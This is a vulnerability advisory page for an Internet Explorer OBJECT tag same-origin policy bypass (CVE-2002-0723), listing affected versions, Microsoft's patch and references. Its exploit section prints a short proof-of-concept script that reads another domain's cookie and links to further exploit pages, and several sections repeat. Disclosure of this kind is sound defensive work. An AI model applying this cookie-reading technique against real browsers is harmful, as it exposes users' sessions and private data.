Microsoft Internet Explorer OBJECT Tag Same Origin Policy Violation Vulnerability
BID:5196
Info
Microsoft Internet Explorer OBJECT Tag Same Origin Policy Violation Vulnerability
| Bugtraq ID: | 5196 |
| Class: | Access Validation Error |
| CVE: |
CVE-2002-0723 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 10 2002 12:00AM |
| Updated: | Jul 11 2009 02:56PM |
| Credit: | Credited to Thor Larholm <[email protected]> and Patrick Zumstein. |
| Vulnerable: |
Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.5 SP2 Microsoft Internet Explorer 5.5 SP1 Microsoft Internet Explorer 5.5 |
| Not Vulnerable: |
Microsoft Internet Explorer 5.0.1 SP2 Microsoft Internet Explorer 5.0.1 SP1 Microsoft Internet Explorer 5.0.1 |
Discussion
Microsoft Internet Explorer OBJECT Tag Same Origin Policy Violation Vulnerability
Microsoft Internet Explorer allows script code to violate the same origin policy through usage of the HTML OBJECT tag. Malicious script code may obtain a legitimate reference to an embedded object containing a web page from the same domain. This script may then change the location of the embedded object to a sensitive page, and maintain the reference to the object. This provides full access to the DOM of the embedded page.
Microsoft Internet Explorer allows script code to violate the same origin policy through usage of the HTML OBJECT tag. Malicious script code may obtain a legitimate reference to an embedded object containing a web page from the same domain. This script may then change the location of the embedded object to a sensitive page, and maintain the reference to the object. This provides full access to the DOM of the embedded page.
Exploit / POC
Microsoft Internet Explorer OBJECT Tag Same Origin Policy Violation Vulnerability
Thor Larholm <[email protected]> has provided proof of concept exploits at the following location:
http://www.PivX.com/larholm/adv/TL003/
The following example, also provided, will display the cookie associated with the domain www.passport.com:
<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.href = "http://www.passport.com";
setTimeout("alert(ref.cookie)",5000);
</script>
A proof-of-concept is available which demonstrates that this issue may be exploited to read some non-parseable files (such as .ini and .bat extensions):
http://www.murphy.101main.net/localread.htm
Thor Larholm <[email protected]> has provided proof of concept exploits at the following location:
http://www.PivX.com/larholm/adv/TL003/
The following example, also provided, will display the cookie associated with the domain www.passport.com:
<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.href = "http://www.passport.com";
setTimeout("alert(ref.cookie)",5000);
</script>
A proof-of-concept is available which demonstrates that this issue may be exploited to read some non-parseable files (such as .ini and .bat extensions):
http://www.murphy.101main.net/localread.htm
Solution / Fix
Microsoft Internet Explorer OBJECT Tag Same Origin Policy Violation Vulnerability
Solution:
Microsoft has released a fix for this vulnerability:
Microsoft Internet Explorer 5.5 SP2
Microsoft Internet Explorer 5.5 SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
Solution:
Microsoft has released a fix for this vulnerability:
Microsoft Internet Explorer 5.5 SP2
-
Microsoft Q323759
Cumulative patch for Internet Explorer.
http://www.microsoft.com/windows/ie/downloads/critical/q323759ie/defau lt.asp
Microsoft Internet Explorer 5.5 SP1
-
Microsoft Q323759
Cumulative patch for Internet Explorer.
http://www.microsoft.com/windows/ie/downloads/critical/q323759ie/defau lt.asp
Microsoft Internet Explorer 5.5
-
Microsoft Q323759
Cumulative patch for Internet Explorer.
http://www.microsoft.com/windows/ie/downloads/critical/q323759ie/defau lt.asp
Microsoft Internet Explorer 6.0
-
Microsoft Q323759
Cumulative patch for Internet Explorer.
http://www.microsoft.com/windows/ie/downloads/critical/q323759ie/defau lt.asp
References
Microsoft Internet Explorer OBJECT Tag Same Origin Policy Violation Vulnerability
References:
References:
- Internet Explorer OBJECT File Reading (Binaries) (Matt Murphy)
- Microsoft Security Bulletin MS02-047 (Microsoft)